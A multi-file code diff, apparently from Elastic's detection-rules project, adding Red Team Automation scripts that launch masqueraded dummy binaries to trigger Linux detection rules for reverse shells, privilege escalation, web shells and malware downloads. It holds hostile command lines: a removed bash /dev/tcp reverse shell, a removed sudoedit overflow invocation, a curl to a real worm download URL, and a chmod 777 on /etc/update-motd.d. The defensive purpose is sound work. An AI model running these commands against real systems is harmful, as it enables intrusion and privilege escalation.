common.log("Simulating reverse shell activity..")
common.execute([*commands], timeout=5, kill=True, shell=True) # noqa: S604
common.log("Reverse shell simulation successful!")
common.log("Cleaning...")
common.remove_file(masquerade)
common.log("Simulation successfull!")
if __name__ == "__main__":
sys.exit(main())
+39
View File
@@ -0,0 +1,39 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="d768af98-4e0b-451a-bc29-04b0be110ee5",
platforms=["linux"],
endpoint=[
{"rule_name": "Linux Reverse Shell via Suspicious Utility", "rule_id": "c71b9783-ca42-4532-8eb3-e8f2fe32ff39"},
],
siem=[],
techniques=["T1059", "T1071"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
common.log("Creating a fake awk executable..")
masquerade = "/tmp/awk"
source = common.get_path("bin", "netcon_exec_chain.elf")
common.copy_file(source, masquerade)
common.log("Granting execute permissions...")
common.execute(["chmod", "+x", masquerade])
commands = [masquerade, "chain", "-h", "8.8.8.8", "-p", "1234", "-c", "/inet/tcp/1234"]
common.log("Simulating reverse shell activity..")
common.execute([*commands], timeout=5, kill=True)
common.log("Reverse shell simulation successful!")
common.log("Cleaning...")
common.remove_file(masquerade)
common.log("Simulation successfull!")
if __name__ == "__main__":
sys.exit(main())
+53
View File
@@ -0,0 +1,53 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="33f3ebda-7776-4cec-933b-48e85d707d61",
platforms=["linux"],
endpoint=[
{
"rule_name": "Suspicious Process Spawned from MOTD Detected",
"rule_id": "b9b3922a-59ee-407c-8773-31b98bf9b18d",
},
],
siem=[
{
"rule_name": "Suspicious Process Spawned from MOTD Detected",
"rule_id": "4ec47004-b34a-42e6-8003-376a123ea447",
},
],
techniques=[""],
)
@common.requires_os(metadata.platforms)
def main() -> None:
common.log("Creating a fake MOTD executable..")
masquerade = "/etc/update-motd.d/socat"
dir_path = "/etc/update-motd.d/"
source = common.get_path("bin", "netcon_exec_chain.elf")
common.log("Granting directory permissions for copy")
common.execute(["sudo", "chmod", "777", dir_path])
common.copy_file(source, masquerade)
common.log("Granting execute permissions...")
common.execute(["chmod", "+x", masquerade])
commands = [masquerade, "exec", "-c", "nc -vz localhost 22"]
common.log("Simulating MOTD netcat activity..")
common.execute([*commands], timeout=5)
common.log("MOTD netcat simulation successful!")
common.log("Cleaning...")
common.remove_file(masquerade)
common.execute(["sudo", "chmod", "755", dir_path])
common.log("RTA completed!")
if __name__ == "__main__":
sys.exit(main())
+39
View File
@@ -0,0 +1,39 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="b2603bac-ba1c-4e6e-a041-ed8772fded75",
platforms=["linux"],
endpoint=[
{"rule_id": "276a5df0-7e20-4218-ade1-3f3ed711d4cb", "rule_name": "Potential Multi Architecture File Downloads"},
],
siem=[],
techniques=["T1105"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/curl"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching fake commands to mimic multi arch file downloads")
command = "http://fake/mipsel"
for _ in range(8):
common.execute([masquerade, command], timeout=0.3, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+44
View File
@@ -0,0 +1,44 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="b48a9dd2-8fe7-41e1-9af2-65f609a54237",
platforms=["linux"],
endpoint=[
{
"rule_id": "8fff17c6-f0ba-4996-bcc3-342a9ebd0ef3",
"rule_name": "Remote Code Execution via Confluence OGNL Injection",
},
],
siem=[],
techniques=["T1190"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/confluence/jre/fake/java"
masquerade2 = "/tmp/bash"
# Using the Linux binary that simulates parent-> child process in Linux
source = common.get_path("bin", "linux_ditto_and_spawn_parent_child")
common.copy_file(source, masquerade)
common.copy_file(source, masquerade2)
# Execute command
common.log("Launching fake commands for Remote Code Execution via Confluence")
command = f"{masquerade2} date"
common.execute([masquerade, "childprocess", command], timeout=10, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
common.remove_file(masquerade2)
if __name__ == "__main__":
sys.exit(main())
+21 -18
View File
@@ -3,33 +3,38 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import subprocess
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="a78663dc-9561-40a9-b4eb-f15e31c690cc",
platforms=["linux"],
endpoint=[{"rule_name": "Potential Privilege Escalation via OverlayFS", "rule_id": "ca9de348-a09d-4c67-af21-5645b70003d0"}],
siem=[{"rule_name": "Potential Privilege Escalation via OverlayFS", "rule_id": "b51dbc92-84e2-4af1-ba47-65183fcd0c57"}],
endpoint=[
{
"rule_name": "Potential Privilege Escalation via OverlayFS",
"rule_id": "ca9de348-a09d-4c67-af21-5645b70003d0",
},
],
siem=[
{
"rule_name": "Potential Privilege Escalation via OverlayFS",
"rule_id": "b51dbc92-84e2-4af1-ba47-65183fcd0c57",
},
],
techniques=["T1068"],
)
@common.requires_os(metadata.platforms)
def main():
@common.requires_os(*metadata.platforms)
def main() -> None:
common.log("Creating a fake unshare executable..")
masquerade = "/tmp/unshare"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
commands = [
masquerade,
'-rm',
'cap_setuid'
]
commands = [masquerade, "-rm", "cap_setuid"]
common.log("Launching fake commands to set cap_setuid via unshare")
common.execute([*commands], timeout=2, kill=True)
@@ -37,17 +42,15 @@ def main():
common.log("Faking uid change via same parent")
sudo_commands = [
"sudo",
"su"
]
sudo_commands = ["sudo", "su"]
subprocess.run(sudo_commands, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
common.execute([*sudo_commands], timeout=2, kill=True)
common.log("Uid change simulation succesful")
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
exit(main())
sys.exit(main())
+49
View File
@@ -0,0 +1,49 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import os
import pathlib
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="884ae75b-d9ed-448c-9267-fb470fffb249",
platforms=["linux"],
endpoint=[{"rule_id": "753f83ff-437b-4952-8612-07e3c1327daf", "rule_name": "Potential Shell via Web Server"}],
siem=[],
techniques=["T1505", "T1505.003"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/httpd"
masquerade2 = "/tmp/bash"
# used only for linux at 2 places to enumerate xargs as parent process.
working_dir = "/tmp/fake_folder/httpd"
# Using the Linux binary that simulates parent-> child process in Linux
source = common.get_path("bin", "linux_ditto_and_spawn_parent_child")
common.copy_file(source, masquerade)
common.copy_file(source, masquerade2)
# In linux the working directory is being projected as parent process.
# Hence, to simulate the parent process without many changes to execute logic
# a fake folder structure is created for execution.
# The execution working directory is changed to the fake folder, to simulate as xargs parent process in Linux.
pathlib.Path(working_dir).mkdir(parents=True, exist_ok=True)
os.chdir(working_dir)
# Execute command
common.log("Launching fake commands for potential shell via webserver")
command = f"{masquerade2} pwd"
common.execute([masquerade, "childprocess", command], timeout=10, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
common.remove_file(masquerade2)
common.remove_directory(working_dir)
if __name__ == "__main__":
sys.exit(main())
+8 -5
View File
@@ -3,15 +3,18 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="dc1baf0d-8048-481a-b142-73313181fe31",
platforms=["linux"],
endpoint=[
{"rule_name": "Privilege Escalation via PKEXEC Exploitation", "rule_id": "30c89cc9-d93c-4134-a976-58f8413f2f32"}
{
"rule_name": "Privilege Escalation via PKEXEC Exploitation",
"rule_id": "30c89cc9-d93c-4134-a976-58f8413f2f32",
},
],
siem=[],
techniques=["T1574", "T1068"],
@@ -19,7 +22,7 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
common.log("Executing command to simulate privilege escalation via PKEXEC exploitation")
# The exploit reproduction is available for commercial usage via MIT License
# https://github.com/berdav/CVE-2021-4034/blob/main/LICENSE
@@ -30,4 +33,4 @@ def main():
if __name__ == "__main__":
exit(main())
sys.exit(main())
+49
View File
@@ -0,0 +1,49 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="32a4b4dd-24b3-4aed-bbce-2ca6ed5e1d69",
platforms=["linux"],
endpoint=[
{
"rule_id": "3144cab7-cc28-46c3-a3ac-8fefe8db22d6",
"rule_name": "Privilege Escalation via Polkit System Service",
},
],
siem=[],
techniques=["T1548"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/dbus-send"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Executing Fake commands to test Privilege Escalation via Polkit System Service")
common.execute(
[
masquerade,
"--dest=org.freedesktop.Accounts",
"org.freedesktop.Accounts.CreateUser",
"org.freedesktop.Accounts.User.SetPassword",
"org.freedesktop.Accounts.DeleteUser",
],
timeout=10,
kill=True,
)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+40
View File
@@ -0,0 +1,40 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import os
import pathlib
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="fb5cd755-cc31-4142-969a-cd14d3142b36",
platforms=["linux"],
endpoint=[
{"rule_id": "aec74eb4-9618-42ff-96eb-2d13e6959d47", "rule_name": "Potential VScode Remote Tunnel Established"},
],
siem=[],
techniques=["T1059"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "code_tunnel.json"
working_dir = "/tmp/fake_folder/code"
source = common.get_path("bin", "linux.ditto_and_spawn")
# Execute command
common.log("Executing Fake commands to test Potential VScode Remote Tunnel Established")
pathlib.Path(working_dir).mkdir(parents=True, exist_ok=True)
os.chdir(working_dir)
common.copy_file(source, masquerade)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+12 -6
View File
@@ -3,9 +3,9 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="83b04be5-ed0f-4efd-a7fd-d5db2b8ab62f",
@@ -14,7 +14,7 @@ metadata = RtaMetadata(
{
"rule_name": "Potential Reverse Shell Activity via Terminal",
"rule_id": "d0e45f6c-1f83-4d97-a8d9-c8f9eb61c15c",
}
},
],
siem=[],
techniques=["T1071", "T1059"],
@@ -22,11 +22,17 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
masquerade = "/tmp/bash"
if common.CURRENT_OS == "linux":
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
else:
common.create_macos_masquerade(masquerade)
common.log("Executing command to simulate reverse shell execution")
common.execute(['bash -c "bash -i >/dev/tcp/127.0.0.1/4444" 0>&1'], shell=True)
common.execute([masquerade, "/dev/tcp/127.0.0.1/4444"], timeout=5, kill=True, shell=True) # noqa: S604
if __name__ == "__main__":
exit(main())
sys.exit(main())
+45
View File
@@ -0,0 +1,45 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <libgen.h>
// Function to create directories for the given path
int create_directories(char *path) {
char *dir_path = dirname(strdup(path)); // Get directory name
char *p = strtok(dir_path, "/"); // Tokenize path
char current_path[1024] = {0}; // Store the path being created
// Iterate through path parts and create directories
while(p != NULL) {
strcat(current_path, "/");
strcat(current_path, p);
mkdir(current_path, S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH); // Create directory with 755 permissions
p = strtok(NULL, "/");
}
free(dir_path); // Free duplicated string
return 0;
}
int main(int argc, char *argv[]) {
// Check if filename is provided
if(argc != 2) {
fprintf(stderr, "Usage: %s <filepath>\n", argv[0]);
exit(EXIT_FAILURE);
}
// Attempt to create the directories for the file
create_directories(argv[1]);
// Attempt to create the file
FILE *file = fopen(argv[1], "w");
if(file == NULL) {
perror("Error creating file");
exit(EXIT_FAILURE);
}
// Close the file and exit
fclose(file);
printf("File '%s' created successfully\n", argv[1]);
exit(EXIT_SUCCESS);
}
+39
View File
@@ -0,0 +1,39 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="3ad5efdc-c186-4dbd-b5ce-f8d1f102002c",
platforms=["linux"],
endpoint=[
{
"rule_name": "Potential SSH-IT SSH Worm Downloaded",
"rule_id": "cb351778-7329-4de9-82b5-6705f772a3af",
},
],
siem=[],
techniques=["T1021", "T1563"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
masquerade = "/tmp/curl"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching fake curl commands to download payload")
common.execute([masquerade, "curl", "https://thc.org/ssh-it/x"], timeout=5, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+15 -10
View File
@@ -3,15 +3,15 @@
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
from . import common
from . import RtaMetadata
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="da35cb80-dad9-4995-ac11-6a408843cd12",
platforms=["linux", "macos"],
endpoint=[
{"rule_name": "Sudo Heap-Based Buffer Overflow Attempt", "rule_id": "95718a3c-edc7-46ef-978b-77891ca6198f"}
{"rule_name": "Sudo Heap-Based Buffer Overflow Attempt", "rule_id": "95718a3c-edc7-46ef-978b-77891ca6198f"},
],
siem=[{"rule_name": "Sudo Heap-Based Buffer Overflow Attempt", "rule_id": "f37f3054-d40b-49ac-aa9b-a786c74c58b8"}],
techniques=["T1068", "T1059"],
@@ -19,23 +19,28 @@ metadata = RtaMetadata(
@common.requires_os(*metadata.platforms)
def main():
def main() -> None:
common.log(
"Executing command to simulate attempted use of a heap-based buffer overflow vulnerability for the "
"Sudo binary in Unix-like systems(CVE-2021-3156)"
"Sudo binary in Unix-like systems(CVE-2021-3156)",
)
# The exploit reproduction is available
# https://www.sudo.ws/security/advisories/unescape_overflow/
# https://blog.aquasec.com/cve-2021-3156-sudo-vulnerability-allows-root-privileges
masquerade = "/tmp/sudo"
if common.CURRENT_OS == "macos":
masquerade = "/tmp/sudo"
common.create_macos_masquerade(masquerade)
common.execute([masquerade, "-s", "sudoedit", "*\\\\"], timeout=10, kill=True)
else:
cmd = """sudoedit -s '\\' `perl -e 'print "A" x 65536'`"""
common.execute(f'bash -c "{cmd}"', shell=True)
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
common.log("Launching fake xargs command to execute Sudo Heap-Based Buffer Overflow Attempt")
common.execute([masquerade, "-s", "sudoedit", "*\\\\"], timeout=10, kill=True)
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
exit(main())
sys.exit(main())
+49
View File
@@ -0,0 +1,49 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import pathlib
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="5fce12c8-642a-49ad-9a94-e21d23149afb",
platforms=["linux"],
endpoint=[
{
"rule_id": "0b206183-7f90-461d-80b3-8a147147ae78",
"rule_name": "Suspicious Kibana Child Process",
},
],
siem=[],
techniques=["T1190", "T1059", "T1059.004"],
)
@common.requires_os(metadata.platforms)
def main() -> None:
masquerade = "/tmp/kibana/node/bin/node"
executable_dir = "/tmp/kibana/node/bin/"
pathlib.Path(executable_dir).mkdir(parents=True, exist_ok=True)
masquerade2 = "/tmp/bash"
# Using the Linux binary that simulates parent-> child process in Linux
source = common.get_path("bin", "linux_ditto_and_spawn_parent_child")
common.copy_file(source, masquerade)
common.copy_file(source, masquerade2)
# Execute command
common.log("Executing Fake Commands to simulate Shell Command Execution via Kworker")
command = (
f"{masquerade2} /bin/sh -c lsb_release -a , "
f"/bin/sh -c git rev-parse --short HEAD echo --unhandled-rejections=warn"
)
common.execute([masquerade, "childprocess", command], timeout=10, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+35
View File
@@ -0,0 +1,35 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="425ba45e-10eb-4067-93f4-95701d26da3d",
platforms=["linux"],
endpoint=[{"rule_id": "fbf9342e-3d1e-4fba-a828-92fa0fb4d21b", "rule_name": "Suspicious Mining Process Events"}],
siem=[],
techniques=["T1059", "T1059.004"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/systemctl"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching fake builtin commands for disabling common mining services by name")
command = "start"
command1 = "apache4.service"
common.execute([masquerade, command, command1], timeout=10, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+34
View File
@@ -0,0 +1,34 @@
# Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one
# or more contributor license agreements. Licensed under the Elastic License
# 2.0; you may not use this file except in compliance with the Elastic License
# 2.0.
import sys
from . import RtaMetadata, common
metadata = RtaMetadata(
uuid="900e2180-6eea-47cb-9960-fcd2156d54bd",
platforms=["linux"],
endpoint=[{"rule_id": "fa59e598-8adc-4798-af82-9f878934d975", "rule_name": "Potential VSingle Malware Infection"}],
siem=[],
techniques=["TA0011"],
)
@common.requires_os(*metadata.platforms)
def main() -> None:
masquerade = "/tmp/wget"
source = common.get_path("bin", "linux.ditto_and_spawn")
common.copy_file(source, masquerade)
# Execute command
common.log("Launching fake builtin commands for vsingle malware infection")
command = "/test/tmp/.sess_fake"
common.execute([masquerade, command], timeout=10, kill=True, shell=True) # noqa: S604
# cleanup
common.remove_file(masquerade)
if __name__ == "__main__":
sys.exit(main())
+1 -1
View File
@@ -80,7 +80,7 @@ class TestRTAs(unittest.TestCase):
for rta_test in sorted(get_available_tests().values(), key=lambda r: r['name']):
self.assertIsNotNone(rta_test.get("uuid"), f'RTA {rta_test.get("name")} missing uuid')
for rule_info in rta_test.get("siem"):
for rule_info in rta_test.get("siem") or []:
for rule_key in rule_keys:
self.assertIsNotNone(rule_info.get(rule_key),
f'RTA {rta_test.get("name")} - {rta_test.get("uuid")} missing {rule_key}')